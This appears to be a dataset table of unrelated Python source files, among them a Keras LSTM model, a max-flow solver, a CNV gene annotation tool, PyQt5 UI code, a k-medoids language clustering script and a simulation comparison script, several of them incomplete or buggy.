text stringlengths 38 1.54M |
|---|
import tensorflow as tf
class LSTMClass(tf.keras.Model):
def __init__(self, **kargs):
super(LSTMClass, self).__init__()
# 임베딩 층에 현재 단어 사전의 개수에 맞는 input_dim을 설정
# LSTM layer을 거쳐서 특징들을 출력한 이후에
# dense layer2개를 거쳐서 대분류 데이터를 출력을 하게 된다.
# 따라서 output차원의 크기는 1이 된다.
self.embedding = tf.keras.layers.Embedding(input_dim = kargs['vocab_size'],
output_dim = kargs['embedding_dimension'])
self.lstm1 = tf.keras.layers.LSTM(units = kargs['lstm_dimension'],
return_sequences = True)
self.lstm2 = tf.keras.layers.LSTM(units = kargs['lstm_dimension'],
return_sequences = True)
self.dense1 = tf.keras.layers.Dense(units = kargs['dense_dimension'],
activation = tf.keras.activations.relu,
)
self.dense2 = tf.keras.layers.Dense(1)
def call(self, x):
x = self.embedding(x)
x = self.lstm1(x)
x = self.lstm2(x)
x = self.dense1(x)
x = self.dense2(x)
return x
model_name = "LSTMFC2"
batch_size, num_epoch, valid_split = 128, 50, 0.2
kargs = {
'vocab_size':1340241, # 전체 단어 사전 속 단어의 개수
'embedding_dimension': 50,
'lstm_dimension': 150,
'dense_dimension': 150,
}
model = LSTMClass(**kargs)
model.compile(
optimizer = tf.keras.optimizers.Adam(1e-3),
loss = tf.keras.losses.CategoricalCrossentropy(),
metrics = [tf.keras.metrics.Accuracy(name = 'accuracy')]
)
from keras.callbacks import ModelCheckpoint
cp_callback = ModelCheckpoint(
checkpoint_path, monitor = 'val_accuracy', verbose = 1,
save_best_only = True, save_weights_only = True
)
label = tf.cast(df['Large'], tf.int32)
history = model.fit(x = train_inputs, y = train_labels,
batch_size = batch_size, epochs = num_epoch, validation_split = valid_split,
callbacks = earlystop_callback) |
# python3
from collections import deque
def max_flow(n,s,t,c):
INF = float("Inf")
max_flow = 0
f = [[0 for k in range(n)] for i in range(n)]
while True:
prev = [-1 for _ in range(n)]
prev[s] = -2
q = deque()
q.append(s)
while q and prev[t]==-1:
u = q.popleft()
for v in range(n):
cf =c[u][v] - f[u][v]
if cf > 0 and prev[v]==-1:
q.append(v)
prev[v] = u
if prev[t]==-1:
break
v = t
delta = INF
while True:
u=prev[v]
cf = c[u][v] - f[u][v]
delta = min(delta, cf)
v = u
if v==s:
break
v = t
while True:
u = prev[v]
f[u][v]+=delta
f[v][u]-=delta
v=u
if v==s:
break
max_flow+=delta
return max_flow
def read_data_test():
lines = open("tests/02","r").readlines()
vertex_count, edge_count = map(int, lines[0].split())
capacity_matrix = [[0 for k in range(vertex_count)] for i in range(vertex_count)]
for _ in range(1,edge_count+1):
u, v, capacity = map(int, lines[_].split())
capacity_matrix[u-1][v-1] = capacity_matrix[u-1][v-1] + capacity
return vertex_count, edge_count, capacity_matrix
def read_data():
vertex_count, edge_count = map(int, input().split())
capacity_matrix = [[0 for k in range(vertex_count)] for i in range(vertex_count)]
for _ in range(1,edge_count+1):
u, v, capacity = map(int, input().split())
capacity_matrix[u-1][v-1] = capacity_matrix[u-1][v-1] + capacity
return vertex_count, edge_count, capacity_matrix
return graph
if __name__ == '__main__':
#graph = read_data()
#vertex_count, edge_count, capacity_matrix = read_data()
vertex_count, edge_count, capacity_matrix = read_data_test()
flow = max_flow(vertex_count,0, vertex_count-1, capacity_matrix)
print(flow) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Usage:
annotation.py call --cnv_fn=IN_FILE [--target_gene_fn=IN_FILE] [--ref=STR] [--out_prefix=STR]
annotation.py -h | --help
Options:
-h --help Show this screen.
--version Show version.
--cnv_fn=IN_FILE Path of SCYN format cnv file.
--target_gene_fn=IN_FILE Path of intersted gene file.
--ref=STR Reference version, [default: hg38]
--out_prefix=STR Path of out file prefix, [default: ./test]
"""
import pickle
import docopt
import pandas as pd
from pybedtools import BedTool
import gzip
import os
from biotool import gene as genetool
from utils import io
###### get bed fn ######
def get_bin_bed(bin_list):
bed_str = '\n'.join(bin_list).replace(':', '\t').replace('-', '\t')
return BedTool(bed_str, from_string=True)
def get_cnv_bed(cnv_fn):
index_name = 'cell_id'
cnv_df = io.read_cnv_fn(cnv_fn, index_name)
cnv_bed = get_bin_bed(cnv_df.columns)
return cnv_df, cnv_bed
def get_gene_bed(ref, use_db=True, target_gene_fn=None):
current_dir, _ = os.path.split(os.path.realpath(__file__))
fn = os.path.join(current_dir, 'db', 'ens_gene.pickle')
gene_dict = pickle.load(open(fn, 'rb')).get(ref + '_gene', {})
gene_list = []
if use_db:
gene_dir = os.path.join(current_dir, 'db', 'gene_list')
gene_list += genetool.read_gene_list_from_dir(gene_dir)
if target_gene_fn:
gene_list += genetool.read_gene_list(target_gene_fn)
bed_str = ''
for i, item in enumerate(gene_dict.items()):
gene, region = item
if use_db and gene not in gene_list:
continue
chrom, start, end, ens_id = region
bed_str += '{}\t{}\t{}\t{}\n'.format(chrom, start, end, gene + ',' + ens_id)
return BedTool(bed_str, from_string=True)
def process_single_hit(gene, hit, cnv_df, feature_list, data_df, matrix_df):
gene, ens_id = hit[3].split(',')
feature_list.append([ens_id, gene, 'CNV Profile'])
cnv_bed_str = '{}:{}-{}'.format(hit[4], hit[5], hit[6])
matrix_df[gene] = cnv_df[cnv_bed_str]
df = pd.DataFrame(data={'0': len(feature_list),
'1': cnv_df.index,
'2': cnv_df[cnv_bed_str]})
data_df = data_df.append(df)
return data_df
def process_hits(gene, hits, cnv_df, feature_list, data_df, matrix_df):
cnv_bed_str_list = []
for i, hit in enumerate(hits):
gene, ens_id = hit[3].split(',')
cnv_bed_str_list.append('{}:{}-{}'.format(hit[4], hit[5], hit[6]))
feature_list.append([ens_id, gene, 'CNV Profile'])
mean_df = cnv_df[cnv_bed_str_list].mean(1)
matrix_df[gene] = mean_df
df = pd.DataFrame(data={'0': len(feature_list),
'1': cnv_df.index,
'2': mean_df})
data_df = data_df.append(df)
return data_df
def run_call(cnv_fn=None, target_gene_fn=None, ref=None, out_prefix=None, **args):
cnv_df, cnv_bed = get_cnv_bed(cnv_fn)
cnv_df.reset_index(inplace=True)
cnv_df.index = cnv_df.index + 1
gene_bed = get_gene_bed(ref, use_db=False)
feature_list = []
data_df = pd.DataFrame()
matrix_df = pd.DataFrame()
prev_gene = None
hits = []
for i, hit in enumerate(gene_bed.window(cnv_bed).overlap(cols=[2, 3, 6, 7])):
gene, _ = hit[3].split(',')
if prev_gene != gene and hits:
data_df = process_hits(gene, hits, cnv_df, feature_list, data_df, matrix_df)
hits = []
hits.append(hit)
prev_gene = gene
# output
cnv_df['cell_id'].to_csv(out_prefix + '_barcodes.tsv.gz', sep='\t', header=False, index=False, compression='gzip')
feature_df = pd.DataFrame(feature_list)
feature_df.to_csv(out_prefix + '_features.tsv.gz', sep='\t', header=False, index=False, compression='gzip')
data_df = data_df.dropna()
df = pd.DataFrame(data={'0': [matrix_df.shape[1]],
'1': [matrix_df.shape[0]],
'2': [data_df.shape[0]]})
data_df = pd.concat([df, data_df])
# data_df['2' == int(data_df['2'])
with gzip.open(out_prefix + '_matrix.mtx.gz', 'w') as f:
f.write(b'%%MatrixMarket matrix coordinate integer general\n')
f.write(b'% cellranger-rna matrix format\n')
f.write(b'% feature index, cell index, copy number profile (index starts with 1)\n')
f.write(b'% produced by scVar.1.0 \n')
data_df.to_csv(out_prefix + '_matrix.mtx.gz', sep=' ', header=False, index=False, compression='gzip', mode='a')
matrix_df.index = cnv_df['cell_id']
matrix_df.to_csv(out_prefix + '_gene_cnv.csv.gz', compression='gzip')
def run(call=None, **args):
if call:
run_call(**args)
if __name__ == "__main__":
args = docopt.docopt(__doc__)
new_args = {}
for k, v in args.items():
new_args[k.replace('--', '')] = v
run(**new_args)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Video4.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_VideoWidget4(object):
def setupUi(self, VideoWidget4):
VideoWidget4.setObjectName("VideoWidget4")
VideoWidget4.resize(979, 463)
self.gridLayout = QtWidgets.QGridLayout(VideoWidget4)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setSpacing(0)
self.gridLayout.setObjectName("gridLayout")
self.widgetView = QtWidgets.QWidget(VideoWidget4)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.widgetView.sizePolicy().hasHeightForWidth())
self.widgetView.setSizePolicy(sizePolicy)
self.widgetView.setMinimumSize(QtCore.QSize(0, 400))
self.widgetView.setObjectName("widgetView")
self.gridLayout_2 = QtWidgets.QGridLayout(self.widgetView)
self.gridLayout_2.setSpacing(5)
self.gridLayout_2.setObjectName("gridLayout_2")
self.label_0 = QtWidgets.QLabel(self.widgetView)
self.label_0.setMaximumSize(QtCore.QSize(400, 200))
self.label_0.setStyleSheet("")
self.label_0.setText("")
self.label_0.setObjectName("label_0")
self.gridLayout_2.addWidget(self.label_0, 0, 0, 1, 1)
self.label_1 = QtWidgets.QLabel(self.widgetView)
self.label_1.setMaximumSize(QtCore.QSize(400, 200))
self.label_1.setStyleSheet("")
self.label_1.setText("")
self.label_1.setObjectName("label_1")
self.gridLayout_2.addWidget(self.label_1, 0, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widgetView)
self.label_2.setMaximumSize(QtCore.QSize(400, 200))
self.label_2.setStyleSheet("")
self.label_2.setText("")
self.label_2.setObjectName("label_2")
self.gridLayout_2.addWidget(self.label_2, 1, 0, 1, 1)
self.label_3 = QtWidgets.QLabel(self.widgetView)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_3.sizePolicy().hasHeightForWidth())
self.label_3.setSizePolicy(sizePolicy)
self.label_3.setMaximumSize(QtCore.QSize(400, 200))
self.label_3.setStyleSheet("")
self.label_3.setText("")
self.label_3.setObjectName("label_3")
self.gridLayout_2.addWidget(self.label_3, 1, 1, 1, 1)
self.gridLayout.addWidget(self.widgetView, 0, 0, 1, 1)
self.retranslateUi(VideoWidget4)
QtCore.QMetaObject.connectSlotsByName(VideoWidget4)
def retranslateUi(self, VideoWidget4):
_translate = QtCore.QCoreApplication.translate
VideoWidget4.setWindowTitle(_translate("VideoWidget4", "Form"))
|
class HTMLAttrMeta(type):
"""meta class for creating properties.
properties registed in elements will be created
in subclass.
"""
def __new__(cls, name, bases, attrs):
elements = attrs['elements']
prefix = attrs['prefix']
for each in elements:
HTMLAttrMeta.addattr(attrs, each, prefix)
return type.__new__(cls, name, bases, attrs)
def attr2str(attr):
if 'val' in attr:
return "%s=\"%s\"" % (attr['name'], attr['val'])
else:
return ''
def addattr(attrs, name, prefix):
def getter(self):
return HTMLAttrMeta.attr2str(getattr(self, '_' + name))
def setter(self, val):
attr = getattr(self, '_' + name)
attr['val'] = val
if prefix:
fullname = prefix + '-' + name
else:
fullname = name
attrs['_' + name] = {'name': fullname}
attrs[name] = property(
fget=getter,
fset=setter,
)
class HTMLAttr(object, metaclass=HTMLAttrMeta):
"""A Python Wrapper for HTML Attributes.
Subclassing this base class will creates related
attributes wrapper.
Example:
class data(HTMLAttr):
prefix = 'data'
elements = ['transition']
creates a string 'data-transition=fade' when trying to
use this its instance as a string.
all its subclass will be initialized by keys in elements
"""
prefix = ''
elements = []
def __init__(self, **meta):
for key, val in meta.items():
if getattr(self, key, None) is not None:
setattr(self, key, val)
def __repr__(self):
content = []
for each in self.elements:
val = getattr(self, each)
if val:
content.append(val)
return ' '.join(content)
|
# from autograd import grad, hessian
#
# gw = lambda x1, x2: x1**4 + x1**2 + 10*x2**3 + x2
# gradient = grad(gw)
# hessian = hessian(gw)
#
# print(gradient(10.0, 10.0))
# print(hessian)
import numpy as np
# import pickle
# from SAGE_VI import SAGE_VI
# dir = "/Users/shinbo/Desktop/metting/LDA/0. data/20news-bydate/newsgroup_preprocessed.pickle"
# sage = SAGE_VI(dir,5,0.1,10,True)
# sage.train(0.01, 100)
# pickle.dump(sage,open('sage_model.pickle', 'wb'))
a = np.array(range(1,4))[:,None]
b = np.ones((3,4))
print(a * b) |
capacity = 3
cache = [None for x in range(capacity)]
print(cache)
def get(pos):
global cache
if (pos > capacity - 1):
return -1
val = cache[pos-1]
shift(pos)
return val
def set(pos, n):
global cache
cache[pos-1] = n
def shift(pos1):
global cache
temp = cache.pop(pos1-1)
cache.append(temp)
set(1, 3)
print(cache)
set(2, 5)
print(cache)
set(3, 7)
print(cache)
print(get(2))
print(cache)
print(get(1))
print(cache)
print(get(9))
print(cache) |
#!/usr/bin/python3
import os,sys
#打开文件
fd=os.open("foo.txt",os.O_RDWR|os.O_CREAT)
#写入字符串
str="this is test"
str=str.encode()
os.write(fd,str)
#关闭文件
os.close(fd)
print("关闭文件成功!!")
|
# -*- coding: utf-8 -*-
"""DB Vocabularies.
$Id$
"""
from zope.interface import implements
from rx.ormlite2.exc import PersistenceError
from rx.ormlite2.dbop import dbquery
from rx.ormlite2.vocabulary.interfaces import IRDBVocabulary
from pyramid.vocabulary.base import ObjectVocabulary
class RDBVocabulary(ObjectVocabulary):
u"""Словарь объектов, загружаемых из БД"""
implements(IRDBVocabulary)
select = None # Кастомизированный запрос к БД
def _load(self):
if self.select is not None:
self._v_skipObjectTypeCheckOnCreation = False
params = {}
return self.objectC.load_many(dbquery(self.select), **params)
self._v_skipObjectTypeCheckOnCreation = True
return self.objectC.load_all()
def _reload(self):
self.by_token = self._mappingFactory()
values = self._load()
self._reindex_by_token(values)
def __init__(self, *args, **kwargs):
assert self.objectC is not None
values = self._load()
super(RDBVocabulary, self).__init__(values, *args, **kwargs)
def _dict2token(self, token):
if isinstance(token, dict):
token = tuple([ token[p] for p in self.objectC.p_keys ])
return token
def __getitem__(self, token):
u"""Возвращает объект, соответствующий указанному токену."""
try:
return super(RDBVocabulary, self).__getitem__(
self._dict2token(token))
except LookupError:
raise PersistenceError(
'Object `%s(%s)` is not found' % (self.objectC.__name__, token))
def getTerm(self, value):
u"""Возвращает терм для указанного объекта"""
try:
return super(RDBVocabulary, self).getTerm(value)
except LookupError:
raise PersistenceError('Object `%s` is not found' % value)
def getTermByToken(self, token):
u"""Возвращает терм, соответствующий указанному токену."""
try:
return super(RDBVocabulary, self).getTermByToken(
self._dict2token(token))
except LookupError:
raise PersistenceError(
'Object `%s(%s)` is not found' % (self.objectC.__name__, token))
|
print(7*24*60)
#nie bedzie przetwa przez pythona jesli
ilosc_minut = 7*24*60
print("Liczba minut w ciagu 7 dni to:" + str(ilosc_minut))
BMI = (masa (78)) / (wzrost (m))** |
import random
import numpy as np
import os
from unidecode import unidecode
import matplotlib.pyplot as plt
def read_file(files, n=3):
# texts is a dict of dicts, so that keys are languages, and values is a dict
# of unique n-consecutive strings in language and their number of repetitions
texts = {}
for i in files:
f = open(i, "rt", encoding="utf8").read().\
replace("\n", " ").\
replace(".", " ").\
replace(",", " ").\
replace(";", " ").\
replace("(", " ").\
replace(")", " ").\
replace(" ", " ").\
replace(" ", " ").\
replace(" ", " ")
f = unidecode(f) # unidecode for normalizing letters
f = f.upper() # to upper letters
f = f.split(' ', 1)
country_name = f[0] # country name
f = f[1] # everything else is language
unique = {}
# get all n-consecutive strings, and count the number of repetitions
# default n = 3
for j in range(n, len(f)):
n_consecutive = f[j-n:j]
# if n-consecutive exists, we increase their value
if n_consecutive in unique:
unique[n_consecutive] += 1
else:
# else we put new key in dict with value 1
unique.update({n_consecutive: 1})
# we put the count of unique n-consecutive strings in text dict
texts.update({country_name: unique})
return texts
class KMedoidsClustering:
def __init__(self, data):
self.data = data
# memoization dictionary
self.distances = {}
def get_distance(self, language1, language2):
# val1 and val2 are dictionaries of values n-consecutive strings and key that are "country" names
if language1 in self.distances:
distance_to = self.distances.get(language1)
if language2 in distance_to:
dist = distance_to.get(language2)
return dist
# n-consecutive strings of both languages
val_language1 = self.data.get(language1)
val_language2 = self.data.get(language2)
# calculating cosine similarity
similarity = self.cosine_similarity(val_language1, val_language2)
distance = 1 - similarity
# adding language to dict if not present
if language1 not in self.distances:
self.distances[language1] = {}
if language2 not in self.distances:
self.distances[language2] = {}
# evaluating distance between languages
self.distances[language1][language2] = distance
self.distances[language2][language1] = distance
return distance
@staticmethod
def cosine_similarity(language1, language2):
# calculating cosine similarity between two languages
# intersection of the same n-consecutive strings for dot product
# common elements (keys) of both dicts
common = set(language1.keys()) & set(language2.keys())
# initialize dot product
dot = 0
for i in common:
dot += (language1.get(i) * language2.get(i))
# calculating the magnitude of vectors
vector1 = np.array(list(language1.values()))
vector2 = np.array(list(language2.values()))
norm_vector1 = np.sqrt(np.sum(vector1 ** 2)) # square root of sum of square element in values of vector1
norm_vector2 = np.sqrt(np.sum(vector2 ** 2)) # square root of sum of square element in values of vector2
# cosine similarity
cos = dot / (norm_vector1 * norm_vector2)
return cos
def select_randomly(self, k=2):
list_of_languages = list(self.data.keys())
random_leaders = []
while len(random_leaders) != k:
leader = random.choice(list_of_languages)
if leader not in random_leaders:
random_leaders.append(leader)
groups = {}
for leader in random_leaders:
groups.update({leader: set()})
return groups
def reorganize_groups(self, groups):
# ----------- CREATING NEW GROUPS BECAUSE LEADERS MIGHT CHANGE ----------- #
# iterate over all languages and see which leader it belongs
for i in self.data:
max_similarity = -1
# remove element from current group and put it next to the right leader
for leader in groups.keys():
if i in groups.get(leader):
groups[leader].remove(i)
belong_to = "None" # currently belong to nobody
# iterate over leaders and calculating cosine distance between current language and leader language
for leader in groups.keys():
distance = self.get_distance(i, leader) # cosine distance
similarity = 1 - distance # cosine similarity
if max_similarity < similarity:
max_similarity = similarity
belong_to = leader
# update current language (i) to leader who is most similar (belong_to)
groups[belong_to].update([i])
return groups
def recalculate_leaders(self, groups):
# ----- RECALCULATING WHO ARE THE LEADERS BECAUSE GROUPS MIGHT HAVE CHANGED ----- #
new_groups = {} # new dict because we cannot change one (groups) in loop
# iterate over all groups
for leader in groups.keys():
group = groups.get(leader)
dist = 0
min_dist = -1
new_leader = "None"
# iterate over all elements in group and calculating
# the distance from all elements to all other elements
for i in group:
for j in group:
if i != j:
dist += self.get_distance(i, j) # cosine distance
# choosing min distance from element to all other elements as the new leader
if min_dist == -1 or dist < min_dist:
min_dist = dist
new_leader = i
dist = 0
# setting current group new leader
new_groups[new_leader] = group
return new_groups
def k_medoids(self, k=2):
# choose k random languages
groups = self.select_randomly(k)
old_groups = {} # for saving previous state of groups
# while loop until the groups remain the same
while groups.keys() != old_groups.keys():
# save current groups to old_groups for comparison in while loop
old_groups = groups
# ----------- CREATING NEW GROUPS BECAUSE LEADERS MIGHT HAVE CHANGED ------------ #
groups = self.reorganize_groups(groups)
# ----- RECALCULATING WHO ARE THE LEADERS BECAUSE GROUPS MIGHT HAVE CHANGED ----- #
groups = self.recalculate_leaders(groups)
return groups
def silhouette(self, groups):
all_silhouettes = [] # storing silhouettes from each data point
for leader in groups.keys():
cluster = groups.get(leader)
# ---- if only one element in cluster silhouette score is zero ---- #
if len(cluster) < 2:
s = 0
all_silhouettes.append(s)
continue
# calculating silhouette score for each data point
for i in cluster:
# ---- initialization of a(i) and b(i) ----- #
a = 0 # a(i)
b = 0 # b(i)
# ---------- CALCULATING a(i) ---------- #
# calculating distance from data point i to all others points in group
for j in cluster:
if i != j:
a += self.get_distance(i, j) # cosine distance
# normalization of a(i)
a /= (len(cluster) - 1)
# ---------- CALCULATING b(i) ---------- #
# calculating to other clusters
all_b = [] # for saving all b(i) to other clusters and than choosing the min
for other_clusters_leader in groups.keys():
tmp_b = 0
if other_clusters_leader != leader:
other_cluster = groups.get(other_clusters_leader)
for j in other_cluster:
tmp_b += self.get_distance(i, j) # cosine distance
# normalization of tmp_b
tmp_b /= len(other_cluster)
all_b.append(tmp_b)
b = min(all_b)
# ----- SILHOUETTE ----- #
s = (b - a) / max(a, b) # silhouette score of one data point
all_silhouettes.append(s)
# calculating the average silhouette score
silhouette_score = sum(all_silhouettes) / len(all_silhouettes)
return silhouette_score
def run(self):
k = 5
all_silhouette_scores = []
# storing the best and worst clusters and their silhouettes
worst_silhouette_score = 1
worst_clusters = {}
best_silhouette_score = 0
best_clusters = {}
for i in range(0, 1000):
clusters = self.k_medoids(k)
silhouette_score = self.silhouette(clusters)
all_silhouette_scores.append(silhouette_score)
if silhouette_score < worst_silhouette_score:
worst_silhouette_score = silhouette_score
worst_clusters = clusters
if silhouette_score > best_silhouette_score:
best_silhouette_score = silhouette_score
best_clusters = clusters
# printing best and worst clusters
print("--------------- BEST CLUSTERS ---------------")
self.print_clusters(best_clusters, best_silhouette_score, "best")
print("--------------- WORST CLUSTERS ---------------")
self.print_clusters(worst_clusters, worst_silhouette_score, "worst")
# --------- HISTOGRAM ---------
self.plot_hist(all_silhouette_scores)
print("--------------- LANGUAGE PREDICTION ---------------")
self.find_language(best_clusters, "OSONCJE")
@staticmethod
def plot_hist(all_silhouette_scores):
# plotting
plt.hist(all_silhouette_scores, bins=50, range=(0, 1), edgecolor='black')
plt.title("A histogram of the frequency of silhouette values at k = 5")
plt.ylabel("Frequency")
plt.xlabel("Silhouette score")
plt.show()
@staticmethod
def print_clusters(clusters, silhouette_score, name):
for leader in clusters.keys():
group = clusters.get(leader)
print(group)
print()
print("Silhouette score for " + name + " clusters: ", silhouette_score)
print()
def find_language(self, clusters, name):
similarities = [] # for storing the similarity values
languages = [] # for storing which language
# calculating similarities
for leader in clusters.keys():
group = clusters.get(leader)
if name in group:
for i in group:
if i != name:
similarity = 1 - self.get_distance(name, i)
similarities.append(similarity)
languages.append(i)
# preparing for printing out the top 3 probabilities
zipped = zip(languages, similarities)
sorted_probabilities = sorted(zipped, key=lambda t: t[1])
if len(sorted_probabilities) > 2:
sorted_probabilities = sorted_probabilities[-3:]
sorted_probabilities.reverse()
for language, probability in sorted_probabilities:
print(name, " is ", language, " language with probability: ", round(probability*100, 2))
if __name__ == "__main__":
entries = os.listdir('languages/')
DATA_FILES = []
for entry in entries:
if entry[0] != '.':
path = "languages/" + entry
DATA_FILES.append(path)
DATA_FILES.append("osoncje.txt")
KMC = KMedoidsClustering(read_file(DATA_FILES))
KMC.run()
|
# Generated by Django 3.2.5 on 2021-08-01 07:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0002_remove_profile_discount'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profile_image',
field=models.ImageField(blank=True, upload_to='media/profiles'),
),
]
|
#!/usr/bin/env python3
"""
Created on March 28, 2023
@author: Gary Black
"""
import argparse
import csv
# absolute values less than this are considered zero due to limits on
# computational precision
NearZero = 1e-12
# print a warning flag for difference values greater than this
FlagPerDiff = 2.0
FlagAbsDiff = 0.1
def checkDiff(value1, value2, message, absFlag=True, printFlag=False):
value1 = float(value1)
value2 = float(value2)
equalFlag = True
if value1 == value2:
if printFlag:
print(message + ' values are equal', flush=True)
else:
if abs(value1)<NearZero and abs(value2)<NearZero:
if printFlag:
print(message + ' values are both within computational precision of zero and considered equal', flush=True)
else:
equalFlag = False
absdiff = abs(value1 - value2)
perdiff = abs(100 * absdiff/((value1 + value2)/2))
if not absFlag and perdiff>FlagPerDiff:
print('*** ' + message + ' values % diff: ' + str(round(perdiff, 4)), flush=True)
elif perdiff>FlagPerDiff and absdiff>FlagAbsDiff:
print('*** ' + message + ' values abs diff: ' + str(round(absdiff, 4)) + ', % diff: ' + str(round(perdiff, 4)), flush=True)
elif printFlag:
print(message + ' values abs diff: ' + str(round(absdiff, 4)) + ', % diff: ' + str(round(perdiff, 4)), flush=True)
return equalFlag
def checkEqual(value1, value2, message):
equalFlag = True
if value1 != value2:
equalFlag = False
print(message + ', sim 1: ' + str(value1) + ', sim 2: ' + str(value2), flush=True)
return equalFlag
def checkSizes(matName, startIndex, row1, row2):
equalFlag = True
if row1[startIndex] != row2[startIndex]:
equalFlag = False
print(matName + ' matrix width mismatch, sim 1: ' + str(row1[startIndex]) + ', sim 2: ' + str(row2[startIndex]), flush=True)
if row1[startIndex+1] != row2[startIndex+1]:
equalFlag = False
print(matName + ' matrix height mismatch, sim 1: ' + str(row1[startIndex+1]) + ', sim 2: ' + str(row2[startIndex+1]), flush=True)
if row1[startIndex+2] != row2[startIndex+2]:
equalFlag = False
print(matName + ' matrix number of entries mismatch, sim 1: ' + str(row1[startIndex+2]) + ', sim 2: ' + str(row2[startIndex+2]), flush=True)
return equalFlag
def checkStats(matName, startIndex, row1, row2):
checkDiff(row1[startIndex], row2[startIndex], matName + ' matrix min')
checkDiff(row1[startIndex+1], row2[startIndex+1], matName + ' matrix max')
checkDiff(row1[startIndex+2], row2[startIndex+2], matName + ' matrix mean')
def _main():
parser = argparse.ArgumentParser()
parser.add_argument("sim_dir1", help="Simulation Directory 1")
parser.add_argument("sim_dir2", help="Simulation Directory 2")
opts = parser.parse_args()
simDir1 = opts.sim_dir1 + '/test_suite/'
simDir2 = opts.sim_dir2 + '/test_suite/'
print('Begin INITALIZATION accuracy comparison:', flush=True)
fp1 = open(simDir1 + 'init_accy.csv', 'r')
fp2 = open(simDir2 + 'init_accy.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
initHeader1 = next(reader1)
initHeader2 = next(reader2)
if initHeader1 != initHeader2:
print('Mismatched init_accy.csv headers being compared--exiting!\n', flush=True)
exit()
initRow1 = next(reader1)
initRow2 = next(reader2)
# init_accy.csv entries: nodeqty,xqty,zqty,Jacobian_elements,Yphys_scaled_terms,F_width,F_height,F_entries,F_min,F_max,F_mean,eyex_width,eyex_height,eyex_entries,eyex_min,eyex_max,eyex_mean,R_width,R_height,R_entries,R_min,R_max,R_mean
# compare nodeqty, xqty, zqty to make sure it's the same model being compared
# across simulations
matchFlag = checkEqual(initRow1[0], initRow2[0], 'Different model number of nodes')
matchFlag = matchFlag and checkEqual(initRow1[1], initRow2[1], 'Different model X dimension')
matchFlag = matchFlag and checkEqual(initRow1[2], initRow2[2], 'Different model Z dimension')
if not matchFlag:
print('Mismatched models being compared--exiting!\n', flush=True)
exit()
checkEqual(initRow1[3], initRow2[3], 'Different number of Jacobian elements')
checkEqual(initRow1[4], initRow2[4], 'Different number of Yphys scaled terms')
checkSizes('F', 5, initRow1, initRow2)
checkStats('F', 8, initRow1, initRow2)
checkSizes('eyex', 11, initRow1, initRow2)
checkStats('eyex', 14, initRow1, initRow2)
checkSizes('R', 17, initRow1, initRow2)
checkStats('R', 20, initRow1, initRow2)
# tests of checkDiff
#checkDiff(10.0, 8.0, 'Test')
#checkDiff(1e-13, 1e-16, 'Zero')
#checkDiff(1e-8, 1e-16, 'Low')
fp1.close()
fp2.close()
print('End INITALIZATION accuracy comparison\n', flush=True)
print('Begin ESTIMATE accuracy comparison:', flush=True)
fp1 = open(simDir1 + 'est_accy.csv', 'r')
fp2 = open(simDir2 + 'est_accy.csv', 'r')
reader1 = csv.reader(fp1)
reader2 = csv.reader(fp2)
estHeader1 = next(reader1)
estHeader2 = next(reader2)
if estHeader1 != estHeader2:
print('Mismatched est_accy.csv headers being compared--exiting!\n', flush=True)
exit()
# to get index numbers
#ctr = 0
#for item in estHeader1:
# print (str(ctr) + ': ' + item, flush=True)
# ctr += 1
itCount = 0
sumPerErr1 = 0.0
sumPerErr2 = 0.0
while True:
try:
# if either of these next calls fails, bail from comparison loop
estRow1 = next(reader1)
estRow2 = next(reader2)
itCount += 1
print('timestamp #' + str(itCount) + ': ' + estRow1[0], flush=True)
checkSizes('P', 1, estRow1, estRow2)
checkStats('P', 4, estRow1, estRow2)
checkSizes('P1', 7, estRow1, estRow2)
checkStats('P1', 10, estRow1, estRow2)
checkSizes('P2', 13, estRow1, estRow2)
checkStats('P2', 16, estRow1, estRow2)
checkSizes('P3', 19, estRow1, estRow2)
checkStats('P3', 22, estRow1, estRow2)
checkSizes('Q', 25, estRow1, estRow2)
checkStats('Q', 28, estRow1, estRow2)
checkSizes('Ppre', 31, estRow1, estRow2)
checkStats('Ppre', 34, estRow1, estRow2)
checkSizes('x', 37, estRow1, estRow2)
checkStats('x', 40, estRow1, estRow2)
checkSizes('xpre', 43, estRow1, estRow2)
checkStats('xpre', 46, estRow1, estRow2)
checkSizes('J', 49, estRow1, estRow2)
checkStats('J', 52, estRow1, estRow2)
checkSizes('S1', 55, estRow1, estRow2)
checkStats('S1', 58, estRow1, estRow2)
checkSizes('S2', 61, estRow1, estRow2)
checkStats('S2', 64, estRow1, estRow2)
checkSizes('S3', 67, estRow1, estRow2)
checkStats('S3', 70, estRow1, estRow2)
checkStats('R', 73, estRow1, estRow2)
checkSizes('Supd', 76, estRow1, estRow2)
checkStats('Supd', 79, estRow1, estRow2)
checkDiff(estRow1[82], estRow2[82], 'Supd matrix condition number estimate')
checkSizes('K3', 83, estRow1, estRow2)
checkStats('K3', 86, estRow1, estRow2)
checkSizes('K2', 89, estRow1, estRow2)
checkStats('K2', 92, estRow1, estRow2)
checkSizes('Kupd', 95, estRow1, estRow2)
checkStats('Kupd', 98, estRow1, estRow2)
#print('Kupd min 1: ' + str(estRow1[98]), flush=True)
#print('Kupd min 2: ' + str(estRow2[98]), flush=True)
#print('Kupd max 1: ' + str(estRow1[99]), flush=True)
#print('Kupd max 2: ' + str(estRow2[99]), flush=True)
#print('Kupd mean 1: ' + str(estRow1[100]), flush=True)
#print('Kupd mean 2: ' + str(estRow2[100]), flush=True)
checkSizes('z', 101, estRow1, estRow2)
